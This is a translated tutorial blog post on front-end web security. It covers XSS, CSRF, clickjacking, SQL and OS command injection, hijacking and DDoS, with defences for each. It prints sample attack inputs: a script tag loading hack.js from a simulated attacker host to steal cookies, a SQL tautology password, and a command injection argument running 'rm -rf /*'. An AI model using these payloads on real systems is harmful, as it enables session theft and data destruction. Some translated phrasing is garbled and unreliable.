The most detailed write-up of front-end security ever


The front end does not need a perfect knowledge of network security, but it can understand most of it and put up a simple defence before one is needed.

Let me go through the common security issues, their solutions, and a small demo; I hope you like it.

Network security roundup

  • XSS
  • CSRF
  • Clickjacking
  • SQL Injection
  • OS injection
  • Request hijacking
  • DDOS

In my opinion, it is enough for the front end to understand and defend against the first four (said quietly: big shots, pretend I didn't say that).

XSS

Cross Site Scripting, also known as a cross-site scripting attack, should by rights be abbreviated CSS, but since CSS was already taken it had to settle for XSS.

what is XSS?

Let's start from the literal meaning. Cross-site, as the name suggests, means we go from one site to another site; script means we write a script into the page content, which you can understand as writing JS code; in the end we have mounted an attack on the website.

For example: after we log in to a website, the login state is usually saved in a cookie; when we then visit another site, it reads that cookie.

XSS hazard

  • Using a fake input form to trick users into handing over personal information.
  • Using a script to steal the user's cookie value; the victim unknowingly helps the attacker send malicious requests.
  • Displaying forged articles or images.

A simple demonstration

// normal
http://localhost:3000/?from=china
// alert probe
http://localhost:3000/?from=<script>alert(3)</script>
// if a 3 pops up, this input is not filtering HTML tags

Simulating cookie theft

http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"></script>

Back-end code (the simulated attacker site)

const koa = require('koa');  // started on port 4000
const chalk = require('chalk');
const log = contents => {
    console.log(chalk.red(contents)); // print the stolen cookie
};

// simulated attacker site
const app = new koa();

module.exports = app;

Defensive measures

  1. Set the X-XSS-Protection header
ctx.set('X-XSS-Protection', 0) // 0 disables the browser's XSS filter; '1; mode=block' turns it on (Chrome and Edge have since removed this filter, so do not rely on it)
  2. Set the HttpOnly cookie
    This is the most effective means of preventing an XSS attack from stealing the user's cookie. When the web application sets a cookie, giving it the HttpOnly attribute prevents the page's cookie from being stolen by malicious client-side JavaScript and protects the user's cookie information.
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly")
  3. CSP
    Content Security Policy (CSP) is an additional layer of security that helps detect and mitigate certain types of attacks, including cross-site scripting (XSS) and data injection attacks. Such attacks are used for everything from stealing data to defacing the site to distributing malware.
    CSP is essentially an allow-list: the developer tells the browser explicitly which external resources may be loaded and executed. We only configure the rules; how they are enforced is up to the browser itself. In this way we can minimise XSS attacks.
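The three XSS defences above, applied to the demo page that reflects `?from=`, as an added example that is not code from the original post. It is written as a koa-style middleware but uses only plain functions, so it runs without koa; the ctx shape (`set`, `cookies.set`, `query`, `body`) follows koa's API and is an assumption of this example.

```javascript
// Added example, not from the original post. Assumes a koa-like ctx
// (ctx.set, ctx.cookies.set, ctx.query, ctx.body); runs without koa.

// 1. Output encoding: the demo page reflects ?from= into HTML, so every
//    character that can open a tag or attribute is escaped first.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);

const renderFrom = (from) => `<p>from: ${escapeHtml(from)}</p>`;

// 2. Security headers: a CSP allow-list (only same-origin scripts, so an
//    injected <script src="http://localhost:4000/hack.js"> is not loaded
//    and inline <script> is refused), plus the legacy X-XSS-Protection
//    header in its "on" form rather than the 0 shown in the post.
const securityHeaders = () => ({
  'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  'X-XSS-Protection': '1; mode=block',
});

// 3. HttpOnly session cookie: unreadable from document.cookie, so even a
//    script that does run cannot ship it to the attacker's site.
const sessionCookieOptions = () => ({ httpOnly: true, path: '/', sameSite: 'lax' });

// koa-style middleware tying the three together. Everything before
// `await next()` runs synchronously when the middleware is called.
const xssDefense = async (ctx, next) => {
  for (const [name, value] of Object.entries(securityHeaders())) ctx.set(name, value);
  ctx.cookies.set('uid', '112', sessionCookieOptions()); // constructed sample session id
  ctx.body = renderFrom(ctx.query.from || '');
  await next();
};

module.exports = { escapeHtml, renderFrom, securityHeaders, sessionCookieOptions, xssDefense };
```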

CSRF

CSRF (Cross Site Request Forgery), that is, cross-site request forgery, is a common kind of web attack. It exploits the identity of a user who is already logged in and, without the user's knowledge, completes illegal operations in the user's name.

what is CSRF?

Again analysing the words literally: cross-site means going from one website to a different website; unlike XSS, what is involved is a request, meaning we send out a request from another site, and that request is forged.

  • The user has logged in to site A, and the cookie is recorded locally.
  • Without logging out of site A (that is, while the cookie is still valid), the user visits a dangerous lure site B supplied by the attacker (site B makes requests to site A).
  • Site A does no CSRF defence of any kind.

CSRF harm

  • Exploits the user's logged-in state
  • Happens without the user's knowledge
  • Completes business requests
  • Steals the user's funds (transfers, purchases)
  • Impersonates the user to post, leaving the user to take the blame
  • Damages the website's reputation

CSRF defense

  • Forbid third-party websites from carrying the cookie - has compatibility issues
  • Referer check - HTTPS does not send the Referer
  • Verification code (captcha)
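The first two defences in the list above, as an added example that is not code from the original post: an Origin/Referer check for state-changing requests and a SameSite cookie so the browser does not attach site A's cookie to requests site B triggers. The koa-style ctx (`method`, `get`, `cookies`, `throw`) is an assumption of this example; URL parsing is plain Node.

```javascript
// Added example, not from the original post. Assumes a koa-like ctx.
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// True when the request provably came from our own origin.
// Origin is checked first (browsers send it on cross-site POSTs); Referer
// is the fallback. A state-changing request with neither header is refused:
// an HTTPS page can legitimately omit Referer, and we cannot tell that
// case apart from a forgery, so the safe default is to refuse.
const isSameOrigin = (method, headers, siteOrigin) => {
  if (SAFE_METHODS.has(method.toUpperCase())) return true;
  const source = headers.origin || headers.referer;
  if (!source) return false;
  try {
    return new URL(source).origin === siteOrigin;
  } catch {
    return false; // unparsable header: treat as hostile
  }
};

// SameSite=Strict stops the browser attaching the cookie to requests that
// site B triggers toward site A. Older browsers ignore the attribute (the
// compatibility issue the post mentions), so the header check stays too.
const sameSiteCookieOptions = () => ({ httpOnly: true, sameSite: 'strict', path: '/' });

// koa-style middleware: refuse cross-site state changes with 403.
const csrfDefense = (siteOrigin) => async (ctx, next) => {
  const headers = { origin: ctx.get('origin'), referer: ctx.get('referer') };
  if (!isSameOrigin(ctx.method, headers, siteOrigin)) ctx.throw(403, 'cross-site request refused');
  await next();
};

module.exports = { isSameOrigin, sameSiteCookieOptions, csrfDefense };
```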

Clickjacking

Clickjacking is a kind of visual deception. The attacker embeds the website to be attacked in their own web page by nesting it in an iframe, makes the iframe transparent, and exposes a button in the page to induce the user to click.

what is clickjacking?

Clickjacking means inducing the user to click; put a picture below and you will probably get it straight away.

How clickjacking defense

X-FRAME-OPTIONS
X-FRAME-OPTIONS is an HTTP response header that is well supported in modern browsers. This response header exists to defend against clickjacking attacks that nest the page in an iframe.

ctx.set('X-FRAME-OPTIONS', 'DENY')

JS way

<head>
  <style id="click-jack">
    html {
      display: none !important;
    }
  </style>
</head>
<body>
  <script>
    if (self === top) {
      // top-level window: remove the hiding style (it lives in <head>, so detach it from its own parent)
      var style = document.getElementById('click-jack')
      style.parentNode.removeChild(style)
    } else {
      // we are framed: break out of the frame
      top.location = self.location
    }
  </script>
</body>

SQL Injection

SQL is the database language we all learn; injection means the attack on the database starts from the front end.

what is sql injection?

As the code below shows, when we build the SQL statement by string concatenation, a bug that behaves like a pipe (1 | 0) appears and the statement becomes always true.

// enter a special password
1'or'1'='1
// the SQL after concatenation
SELECT *
FROM test.user
WHERE username = 'laowang'
AND password = '1'or'1'='1'

Defensive measures

The defence is actually simple. Each language provides its own way, but the principle is the same: do not concatenate strings; use placeholders instead.

  • The web application should strictly limit the permissions it has on the database, giving this user only the lowest privileges that still let it do its work, so that the harm an injection attack can do to the database is kept to a minimum.
  • Escape or encode special characters that go into the database (', ", \, <, >, &, *, ; and so on). Practically every back-end language has a way to escape strings, for example lodash's lodash._escapehtmlchar.
  • The back-end code checks whether the submitted data matches expectations and strictly restricts the type of each variable, for example by doing some matching with regular expressions.
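The login query from the section above, as an added example that is not code from the original post: the vulnerable concatenation, the placeholder form, an input allow-list, and an escaping helper for the bullet on special characters. `db.execute(sql, params)` is assumed to be a prepared-statement API of the shape mysql2 exposes; nothing here opens a real database.

```javascript
// Added example, not from the original post. `db` is assumed to expose
// execute(sql, params) as a prepared statement; no database is opened here.

// Vulnerable: the password text becomes part of the SQL grammar, so the
// special password from the post turns the WHERE clause into a tautology.
const loginQueryUnsafe = (username, password) =>
  `SELECT * FROM test.user WHERE username = '${username}' AND password = '${password}'`;

// Safe: the SQL text is fixed; values travel separately as parameters and
// can never change the WHERE clause, whatever quotes they contain.
const LOGIN_SQL = 'SELECT * FROM test.user WHERE username = ? AND password = ?';
const loginQuery = (db, username, password) => db.execute(LOGIN_SQL, [username, password]);

// Input allow-list (the post's third bullet): reject usernames that do not
// look like usernames before they reach the database at all. The exact
// pattern is this example's assumption.
const USERNAME_RE = /^[A-Za-z0-9_]{3,32}$/;
const isValidUsername = (u) => typeof u === 'string' && USERNAME_RE.test(u);

// Escaping (the post's second bullet) for the rare string literal where a
// placeholder cannot be used: backslash the characters MySQL treats
// specially. Placeholders remain the first choice.
const SQL_ESCAPES = {
  '\0': '\\0', '\n': '\\n', '\r': '\\r', '\b': '\\b', '\t': '\\t',
  '\x1a': '\\Z', '\\': '\\\\', "'": "\\'", '"': '\\"',
};
const escapeSqlString = (s) => String(s).replace(/[\0\n\r\b\t\x1a\\'"]/g, (c) => SQL_ESCAPES[c]);

module.exports = { loginQueryUnsafe, loginQuery, LOGIN_SQL, isValidUsername, escapeSqlString };
```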

I have only learned a few defences myself; I am a front-end newbie.

OS command injection

OS command injection is much like SQL injection, except that SQL injection targets the database while OS command injection targets the operating system. An OS command injection attack means executing illegal operating system commands through the web application to achieve the attacker's goal. Anywhere a shell function can be called carries the risk of being attacked; if the call to the shell is careless, the inserted illegal command can be executed.

// Take Node.js as an example: suppose an API needs to download a user-specified repo from GitHub
// (deliberately vulnerable: the user's input is interpolated straight into a shell command)
const exec = require('mz/child_process').exec;
let params = {/* parameters supplied by the user */};
exec(`git clone ${params.repo} /some/path`);

If the argument is

https://github.com/xx/xx.git && rm -rf /* &&

Request hijacking

  • DNS hijacking
    As the name implies, the DNS server (some step of DNS resolution) has been tampered with, changing the result of domain-name resolution so that the IP reached is not the intended one.
  • HTTP hijacking
    Carrier (ISP) hijacking; at this point about the only option is to upgrade to HTTPS.

DDOS

Distributed denial of service attack (Distributed Denial of Service)

what is DDOS?

DDoS is not a single kind of attack but the general name for a large class of attacks. There are dozens of types, and new attack methods are constantly being invented. Every link in the chain of running a website can be an attack target. As long as one link is broken so that the whole process cannot run, the goal of paralysing the service is reached.

Among them, a fairly common kind is the CC attack. Put simply, it sends a huge volume of normal requests, exceeding what the server can receive, and causes it to go down. What I ran into was a CC attack: at its peak roughly twenty-odd IP addresses around the world took turns sending requests, each address making 200 to 300 requests per second. When I looked at the access log, those requests felt like flood water pouring in; in the blink of an eye there was a big pile of them, and within a few minutes the log file had grown by 100MB. To be honest, this only counts as a small attack, but my website had no protection at all and the server was shared with other people, so as soon as that traffic arrived it went offline.

How to defend

To put it bluntly, it is solved by spending money.


Origin www.cnblogs.com/sunhang32/p/12216125.html